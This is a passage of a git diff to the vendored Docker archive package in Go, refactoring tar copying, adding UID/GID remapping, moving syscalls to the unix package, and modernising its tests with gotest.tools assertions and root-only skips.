int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil { + return err + } - tw := tar.NewWriter(w) - defer tw.Close() - if err := tw.WriteHeader(hdr); err != nil { - return err - } - if _, err := io.Copy(tw, srcF); err != nil { - return err - } - return nil - }) + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }() + }() defer func() { if er := <-errC; err == nil && er != nil { err = er @@ -1080,23 +1199,21 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { return err } -// CopyFileWithTar emulates the behavior of the 'cp' command-line -// for a single file. It copies a regular file from path `src` to -// path `dst`, and preserves all its metadata. -// -// Destination handling is in an operating specific manner depending -// where the daemon is running. If `dst` ends with a trailing slash -// the final destination path will be `dst/base(src)` (Linux) or -// `dst\base(src)` (Windows). -func CopyFileWithTar(src, dst string) (err error) { - return defaultArchiver.CopyFileWithTar(src, dst) +// IDMappings returns the IDMappings of the archiver. +func (archiver *Archiver) IDMappings() *idtools.IDMappings { + return archiver.IDMappingsVar +} + +func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error { + ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid}) + hdr.Uid, hdr.Gid = ids.UID, ids.GID + return err } // cmdStream executes a command, and returns its stdout as a stream. // If the command fails to run or doesn't complete successfully, an error // will be returned, including anything written on stderr. -func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) { - chdone := make(chan struct{}) +func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, error) { cmd.Stdin = input pipeR, pipeW := io.Pipe() cmd.Stdout = pipeW @@ -1105,7 +1222,7 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, // Run the command and return the pipe if err := cmd.Start(); err != nil { - return nil, nil, err + return nil, err } // Copy stdout to the returned pipe @@ -1115,10 +1232,9 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, } else { pipeW.Close() } - close(chdone) }() - return pipeR, chdone, nil + return pipeR, nil } // NewTempArchive reads the content of src into a temporary file, and returns the contents diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go index 6b2a31ff1f..970d4d0680 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go @@ -1,13 +1,13 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "os" "path/filepath" "strings" - "syscall" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { @@ -67,12 +67,9 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, // if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay if base == WhiteoutOpaqueDir { - if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil { - return false, err - } - + err := unix.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0) // don't write the file itself - return false, nil + return false, err } // if a file was deleted and we are using overlay, we need to create a character device @@ -80,7 +77,7 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, originalBase := base[len(WhiteoutPrefix):] originalPath := filepath.Join(dir, originalBase) - if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil { + if err := unix.Mknod(originalPath, unix.S_IFCHR, 0); err != nil { return false, err } if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go index d5f046e9df..9422269dff 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -8,6 +8,9 @@ import ( "testing" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + "gotest.tools/skip" ) // setupOverlayTestDir creates files in a directory with overlay whiteouts @@ -20,47 +23,39 @@ import ( // └── d3 # 0700 // └── f1 # whiteout, 0644 func setupOverlayTestDir(t *testing.T, src string) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") // Create opaque directory containing single file and permission 0700 - if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil { - t.Fatal(err) - } + err := os.Mkdir(filepath.Join(src, "d1"), 0700) + assert.NilError(t, err) - if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { - t.Fatal(err) - } + err = system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0) + assert.NilError(t, err) - if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600) + assert.NilError(t, err) // Create another opaque directory containing single file but with permission 0750 - if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil { - t.Fatal(err) - } + err = os.Mkdir(filepath.Join(src, "d2"), 0750) + assert.NilError(t, err) - if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { - t.Fatal(err) - } + err = system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0) + assert.NilError(t, err) - if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660) + assert.NilError(t, err) // Create regular directory with deleted file - if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil { - t.Fatal(err) - } + err = os.Mkdir(filepath.Join(src, "d3"), 0700) + assert.NilError(t, err) - if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil { - t.Fatal(err) - } + err = system.Mknod(filepath.Join(src, "d3", "f1"), unix.S_IFCHR, 0) + assert.NilError(t, err) } func checkOpaqueness(t *testing.T, path string, opaque string) { xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if string(xattrOpaque) != opaque { t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque) } @@ -69,9 +64,8 @@ func checkOpaqueness(t *testing.T, path string, opaque string) { func checkOverlayWhiteout(t *testing.T, path string) { stat, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + statT, ok := stat.Sys().(*syscall.Stat_t) if !ok { t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", stat.Sys()) @@ -83,9 +77,8 @@ func checkOverlayWhiteout(t *testing.T, path string) { func checkFileMode(t *testing.T, path string, perm os.FileMode) { stat, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if stat.Mode() != perm { t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm) } @@ -93,23 +86,17 @@ func checkFileMode(t *testing.T, path string, perm os.FileMode) { func TestOverlayTarUntar(t *testing.T) { oldmask, err := system.Umask(0) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer system.Umask(oldmask) src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) setupOverlayTestDir(t, src) dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dst) options := &TarOptions{ @@ -117,14 +104,11 @@ func TestOverlayTarUntar(t *testing.T) { WhiteoutFormat: OverlayWhiteoutFormat, } archive, err := TarWithOptions(src, options) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer archive.Close() - if err := Untar(archive, dst, options); err != nil { - t.Fatal(err) - } + err = Untar(archive, dst, options) + assert.NilError(t, err) checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) @@ -141,40 +125,31 @@ func TestOverlayTarUntar(t *testing.T) { func TestOverlayTarAUFSUntar(t *testing.T) { oldmask, err := system.Umask(0) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer system.Umask(oldmask) src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) setupOverlayTestDir(t, src) dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dst) archive, err := TarWithOptions(src, &TarOptions{ Compression: Uncompressed, WhiteoutFormat: OverlayWhiteoutFormat, }) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer archive.Close() - if err := Untar(archive, dst, &TarOptions{ + err = Untar(archive, dst, &TarOptions{ Compression: Uncompressed, WhiteoutFormat: AUFSWhiteoutFormat, - }); err != nil { - t.Fatal(err) - } + }) + assert.NilError(t, err) checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700) diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go index 54acbf2856..462dfc6323 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_other.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { return nil diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go index b883be33ed..9f06af9969 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go @@ -1,18 +1,26 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "bytes" + "compress/gzip" "fmt" "io" "io/ioutil" "os" "os/exec" "path/filepath" + "reflect" "runtime" "strings" "testing" "time" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) var tmp string @@ -24,35 +32,22 @@ func init() { } } -func TestIsArchiveNilHeader(t *testing.T) { - out := IsArchive(nil) - if out { - t.Fatalf("isArchive should return false as nil is not a valid archive header") - } +var defaultArchiver = NewDefaultArchiver() + +func defaultTarUntar(src, dst string) error { + return defaultArchiver.TarUntar(src, dst) } -func TestIsArchiveInvalidHeader(t *testing.T) { - header := []byte{0x00, 0x01, 0x02} - out := IsArchive(header) - if out { - t.Fatalf("isArchive should return false as %s is not a valid archive header", header) - } +func defaultUntarPath(src, dst string) error { + return defaultArchiver.UntarPath(src, dst) } -func TestIsArchiveBzip2(t *testing.T) { - header := []byte{0x42, 0x5A, 0x68} - out := IsArchive(header) - if !out { - t.Fatalf("isArchive should return true as %s is a bz2 header", header) - } +func defaultCopyFileWithTar(src, dst string) (err error) { + return defaultArchiver.CopyFileWithTar(src, dst) } -func TestIsArchive7zip(t *testing.T) { - header := []byte{0x50, 0x4b, 0x03, 0x04} - out := IsArchive(header) - if out { - t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header) - } +func defaultCopyWithTar(src, dst string) error { + return defaultArchiver.CopyWithTar(src, dst) } func TestIsArchivePathDir(t *testing.T) { @@ -81,12 +76,7 @@ func TestIsArchivePathInvalidFile(t *testing.T) { } func TestIsArchivePathTar(t *testing.T) { - var whichTar string - if runtime.GOOS == "solaris" { - whichTar = "gtar" - } else { - whichTar = "tar" - } + whichTar := "tar" cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar) cmd := exec.Command("sh", "-c", cmdStr) output, err := cmd.CombinedOutput() @@ -101,7 +91,7 @@ func TestIsArchivePathTar(t *testing.T) { } } -func testDecompressStream(t *testing.T, ext, compressCommand string) { +func testDecompressStream(t *testing.T, ext, compressCommand string) io.Reader { cmd := exec.Command("sh", "-c", fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand)) output, err := cmd.CombinedOutput() @@ -125,6 +115,8 @@ func testDecompressStream(t *testing.T, ext, compressCommand string) { if err = r.Close(); err != nil { t.Fatalf("Failed to close the decompressed stream: %v ", err) } + + return r } func TestDecompressStreamGzip(t *testing.T) { @@ -142,7 +134,7 @@ func TestDecompressStreamXz(t *testing.T) { testDecompressStream(t, "xz", "xz -f") } -func TestCompressStreamXzUnsuported(t *testing.T) { +func TestCompressStreamXzUnsupported(t *testing.T) { dest, err := os.Create(tmp + "dest") if err != nil { t.Fatalf("Fail to create the destination file") @@ -162,9 +154,9 @@ func TestCompressStreamBzip2Unsupported(t *testing.T) { } defer dest.Close() - _, err = CompressStream(dest, Xz) + _, err = CompressStream(dest, Bzip2) if err == nil { - t.Fatalf("Should fail as xz is unsupported for compression format.") + t.Fatalf("Should fail as bzip2 is unsupported for compression format.") } } @@ -207,20 +199,20 @@ func TestExtensionGzip(t *testing.T) { compression := Gzip output := compression.Extension() if output != "tar.gz" { - t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'") + t.Fatalf("The extension of a gzip archive should be 'tar.gz'") } } func TestExtensionXz(t *testing.T) { compression := Xz output := compression.Extension() if output != "tar.xz" { - t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'") + t.Fatalf("The extension of a xz archive should be 'tar.xz'") } } func TestCmdStreamLargeStderr(t *testing.T) { cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello") - out, _, err := cmdStream(cmd, nil) + out, err := cmdStream(cmd, nil) if err != nil { t.Fatalf("Failed to start command: %s", err) } @@ -245,7 +237,7 @@ func TestCmdStreamBad(t *testing.T) { t.Skip("Failing on Windows CI machines") } badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1") - out, _, err := cmdStream(badCmd, nil) + out, err := cmdStream(badCmd, nil) if err != nil { t.Fatalf("Failed to start command: %s", err) } @@ -260,7 +252,7 @@ func TestCmdStreamBad(t *testing.T) { func TestCmdStreamGood(t *testing.T) { cmd := exec.Command("sh", "-c", "echo hello; exit 0") - out, _, err := cmdStream(cmd, nil) + out, err := cmdStream(cmd, nil) if err != nil { t.Fatal(err) } @@ -273,9 +265,7 @@ func TestCmdStreamGood(t *testing.T) { func TestUntarPathWithInvalidDest(t *testing.T) { tempFolder, err := ioutil.TempDir("", "docker-archive-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tempFolder) invalidDestFolder := filepath.Join(tempFolder, "invalidDest") // Create a src file @@ -294,11 +284,9 @@ func TestUntarPathWithInvalidDest(t *testing.T) { cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - err = UntarPath(tarFile, invalidDestFolder) + err = defaultUntarPath(tarFile, invalidDestFolder) if err == nil { t.Fatalf("UntarPath with invalid destination path should throw an error.") } @@ -310,17 +298,16 @@ func TestUntarPathWithInvalidSrc(t *testing.T) { t.Fatalf("Fail to create the destination file") } defer os.RemoveAll(dest) - err = UntarPath("/invalid/path", dest) + err = defaultUntarPath("/invalid/path", dest) if err == nil { t.Fatalf("UntarPath with invalid src path should throw an error.") } } func TestUntarPath(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpFolder, err := ioutil.TempDir("", "docker-archive-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tmpFolder) srcFile := filepath.Join(tmpFolder, "src") tarFile := filepath.Join(tmpFolder, "src.tar") @@ -341,11 +328,9 @@ func TestUntarPath(t *testing.T) { } cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - err = UntarPath(tarFile, destFolder) + err = defaultUntarPath(tarFile, destFolder) if err != nil { t.Fatalf("UntarPath shouldn't throw an error, %s.", err) } @@ -384,7 +369,7 @@ func TestUntarPathWithDestinationFile(t *testing.T) { if err != nil { t.Fatalf("Fail to create the destination file") } - err = UntarPath(tarFile, destFile) + err = defaultUntarPath(tarFile, destFile) if err == nil { t.Fatalf("UntarPath should throw an error if the destination if a file") } @@ -427,7 +412,7 @@ func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) { if err != nil { t.Fatal(err) } - err = UntarPath(tarFile, destFolder) + err = defaultUntarPath(tarFile, destFolder) if err != nil { t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder") } @@ -444,13 +429,14 @@ func TestCopyWithTarInvalidSrc(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyWithTar(invalidSrc, destFolder) + err = defaultCopyWithTar(invalidSrc, destFolder) if err == nil { t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") } } func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tempFolder, err := ioutil.TempDir("", "docker-archive-test") if err != nil { t.Fatal(nil) @@ -461,7 +447,7 @@ func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyWithTar(srcFolder, inexistentDestFolder) + err = defaultCopyWithTar(srcFolder, inexistentDestFolder) if err != nil { t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") } @@ -490,7 +476,7 @@ func TestCopyWithTarSrcFile(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err != nil { t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) } @@ -519,7 +505,7 @@ func TestCopyWithTarSrcFolder(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err != nil { t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) } @@ -542,7 +528,7 @@ func TestCopyFileWithTarInvalidSrc(t *testing.T) { t.Fatal(err) } invalidFile := filepath.Join(tempFolder, "doesnotexists") - err = CopyFileWithTar(invalidFile, destFolder) + err = defaultCopyFileWithTar(invalidFile, destFolder) if err == nil { t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") } @@ -560,7 +546,7 @@ func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyFileWithTar(srcFile, inexistentDestFolder) + err = defaultCopyFileWithTar(srcFile, inexistentDestFolder) if err != nil { t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") } @@ -587,7 +573,7 @@ func TestCopyFileWithTarSrcFolder(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyFileWithTar(src, dest) + err = defaultCopyFileWithTar(src, dest) if err == nil { t.Fatalf("CopyFileWithTar should throw an error with a folder.") } @@ -611,7 +597,7 @@ func TestCopyFileWithTarSrcFile(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest+"/") + err = defaultCopyWithTar(src, dest+"/") if err != nil { t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err) } @@ -654,7 +640,7 @@ func checkNoChanges(fileNum int, hardlinks bool) error { return err } - err = TarUntar(srcDir, destDir) + err = defaultTarUntar(srcDir, destDir) if err != nil { return err } @@ -742,6 +728,57 @@ func TestTarUntar(t *testing.T) { } } +func TestTarWithOptionsChownOptsAlwaysOverridesIdPair(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-chown-opt") + assert.NilError(t, err) + + defer os.RemoveAll(origin) + filePath := filepath.Join(origin, "1") + err = ioutil.WriteFile(filePath, []byte("hello world"), 0700) + assert.NilError(t, err) + + idMaps := []idtools.IDMap{ + 0: { + ContainerID: 0, + HostID: 0, + Size: 65536, + }, + 1: { + ContainerID: 0, + HostID: 100000, + Size: 65536, + }, + } + + cases := []struct { + opts *TarOptions + expectedUID int + expectedGID int + }{ + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1337, GID: 42}}, 1337, 42}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 100001, GID: 100001}, UIDMaps: idMaps, GIDMaps: idMaps}, 100001, 100001}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 0, GID: 0}, NoLchown: false}, 0, 0}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1, GID: 1}, NoLchown: true}, 1, 1}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1000, GID: 1000}, NoLchown: true}, 1000, 1000}, + } + for _, testCase := range cases { + reader, err := TarWithOptions(filePath, testCase.opts) + assert.NilError(t, err) + tr := tar.NewReader(reader) + defer reader.Close() + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + assert.NilError(t, err) + assert.Check(t, is.Equal(hdr.Uid, testCase.expectedUID), "Uid equals expected value") + assert.Check(t, is.Equal(hdr.Gid, testCase.expectedGID), "Gid equals expected value") + } + } +} + func TestTarWithOptions(t *testing.T) { // TODO Windows: Figure out how to fix this test. if runtime.GOOS == "windows" { @@ -868,7 +905,7 @@ func BenchmarkTarUntar(b *testing.B) { b.ResetTimer() b.SetBytes(int64(n)) for n := 0; n < b.N; n++ { - err := TarUntar(origin, target) + err := defaultTarUntar(origin, target) if err != nil { b.Fatal(err) } @@ -896,7 +933,7 @@ func BenchmarkTarUntarWithLinks(b *testing.B) { b.ResetTimer() b.SetBytes(int64(n)) for n := 0; n < b.N; n++ { - err := TarUntar(origin, target) + err := defaultTarUntar(origin, target) if err != nil { b.Fatal(err) } @@ -934,9 +971,8 @@ func TestUntarInvalidFilenames(t *testing.T) { func TestUntarHardlinkToSymlink(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now - if runtime.GOOS == "windows" { - t.Skip("hardlinks on Windows") - } + skip.If(t, runtime.GOOS == "windows", "hardlinks on Windows") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") for i, headers := range [][]*tar.Header{ { { @@ -1149,8 +1185,10 @@ func TestUntarInvalidSymlink(t *testing.T) { func TestTempArchiveCloseMultipleTimes(t *testing.T) { reader := ioutil.NopCloser(strings.NewReader("hello")) tempArchive, err := NewTempArchive(reader, "") + assert.NilError(t, err) buf := make([]byte, 10) n, err := tempArchive.Read(buf) + assert.NilError(t, err) if n != 5 { t.Fatalf("Expected to read 5 bytes. Read %d instead", n) } @@ -1160,3 +1198,167 @@ func TestTempArchiveCloseMultipleTimes(t *testing.T) { } } } + +func TestReplaceFileTarWrapper(t *testing.T) { + filesInArchive := 20 + testcases := []struct { + doc string + filename string + modifier TarModifierFunc + expected string + fileCount int + }{ + { + doc: "Modifier creates a new file", + filename: "newfile", + modifier: createModifier(t), + expected: "the new content", + fileCount: filesInArchive + 1, + }, + { + doc: "Modifier replaces a file", + filename: "file-2", + modifier: createOrReplaceModifier, + expected: "the new content", + fileCount: filesInArchive, + }, + { + doc: "Modifier replaces the last file", + filename: fmt.Sprintf("file-%d", filesInArchive-1), + modifier: createOrReplaceModifier, + expected: "the new content", + fileCount: filesInArchive, + }, + { + doc: "Modifier appends to a file", + filename: "file-3", + modifier: appendModifier, + expected: "fooo\nnext line", + fileCount: filesInArchive, + }, + } + + for _, testcase := range testcases { + sourceArchive, cleanup := buildSourceArchive(t, filesInArchive) + defer cleanup() + + resultArchive := ReplaceFileTarWrapper( + sourceArchive, + map[string]TarModifierFunc{testcase.filename: testcase.modifier}) + + actual := readFileFromArchive(t, resultArchive, testcase.filename, testcase.fileCount, testcase.doc) + assert.Check(t, is.Equal(testcase.expected, actual), testcase.doc) + } +} + +// TestPrefixHeaderReadable tests that files that could be created with the +// version of this package that was built with <=go17 are still readable. +func TestPrefixHeaderReadable(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + // https://gist.github.com/stevvooe/e2a790ad4e97425896206c0816e1a882#file-out-go + var testFile = []byte("\x1f\x8b\x08\x08\x44\x21\x68\x59\x00\x03\x74\x2e\x74\x61\x72\x00\x4b\xcb\xcf\x67\xa0\x35\x30\x80\x00\x86\x06\x10\x47\x01\xc1\x37\x40\x00\x54\xb6\xb1\xa1\xa9\x99\x09\x48\x25\x1d\x40\x69\x71\x49\x62\x91\x02\xe5\x76\xa1\x79\x84\x21\x91\xd6\x80\x72\xaf\x8f\x82\x51\x30\x0a\x46\x36\x00\x00\xf0\x1c\x1e\x95\x00\x06\x00\x00") + + tmpDir, err := ioutil.TempDir("", "prefix-test") + assert.NilError(t, err) + defer os.RemoveAll(tmpDir) + err = Untar(bytes.NewReader(testFile), tmpDir, nil) + assert.NilError(t, err) + + baseName := "foo" + pth := strings.Repeat("a", 100-len(baseName)) + "/" + baseName + + _, err = os.Lstat(filepath.Join(tmpDir, pth)) + assert.NilError(t, err) +} + +func buildSourceArchive(t *testing.T, numberOfFiles int) (io.ReadCloser, func()) { + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + assert.NilError(t, err) + + _, err = prepareUntarSourceDirectory(numberOfFiles, srcDir, false) + assert.NilError(t, err) + + sourceArchive, err := TarWithOptions(srcDir, &TarOptions{}) + assert.NilError(t, err) + return sourceArchive, func() { + os.RemoveAll(srcDir) + sourceArchive.Close() + } +} + +func createOrReplaceModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + return &tar.Header{ + Mode: 0600, + Typeflag: tar.TypeReg, + }, []byte("the new content"), nil +} + +func createModifier(t *testing.T) TarModifierFunc { + return func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + assert.Check(t, is.Nil(content)) + return createOrReplaceModifier(path, header, content) + } +} + +func appendModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + buffer := bytes.Buffer{} + if content != nil { + if _, err := buffer.ReadFrom(content); err != nil { + return nil, nil, err + } + } + buffer.WriteString("\nnext line") + return &tar.Header{Mode: 0600, Typeflag: tar.TypeReg}, buffer.Bytes(), nil +} + +func readFileFromArchive(t *testing.T, archive io.ReadCloser, name string, expectedCount int, doc string) string { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + destDir, err := ioutil.TempDir("", "docker-test-destDir") + assert.NilError(t, err) + defer os.RemoveAll(destDir) + + err = Untar(archive, destDir, nil) + assert.NilError(t, err) + + files, _ := ioutil.ReadDir(destDir) + assert.Check(t, is.Len(files, expectedCount), doc) + + content, err := ioutil.ReadFile(filepath.Join(destDir, name)) + assert.Check(t, err) + return string(content) +} + +func TestDisablePigz(t *testing.T) { + _, err := exec.LookPath("unpigz") + if err != nil { + t.Log("Test will not check full path when Pigz not installed") + } + + os.Setenv("MOBY_DISABLE_PIGZ", "true") + defer os.Unsetenv("MOBY_DISABLE_PIGZ") + + r := testDecompressStream(t, "gz", "gzip -f") + // For the bufio pool + outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper) + // For the context canceller + contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper) + + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{})) +} + +func TestPigz(t *testing.T) { + r := testDecompressStream(t, "gz", "gzip -f") + // For the bufio pool + outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper) + // For the context canceller + contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper) + + _, err := exec.LookPath("unpigz") + if err == nil { + t.Log("Tested whether Pigz is used, as it installed") + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&io.PipeReader{})) + } else { + t.Log("Tested whether Pigz is not used, as it not installed") + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{})) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go index 7083f2fa53..e81076c170 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,8 +9,10 @@ import ( "path/filepath" "syscall" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/system" rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" ) // fixVolumePathPrefix does platform specific processing to ensure that if @@ -41,41 +43,38 @@ func chmodTarEntry(perm os.FileMode) os.FileMode { return perm // noop for unix as golang APIs provide perm bits correctly } -func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { +func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) { s, ok := stat.(*syscall.Stat_t) - if !ok { - err = errors.New("cannot convert 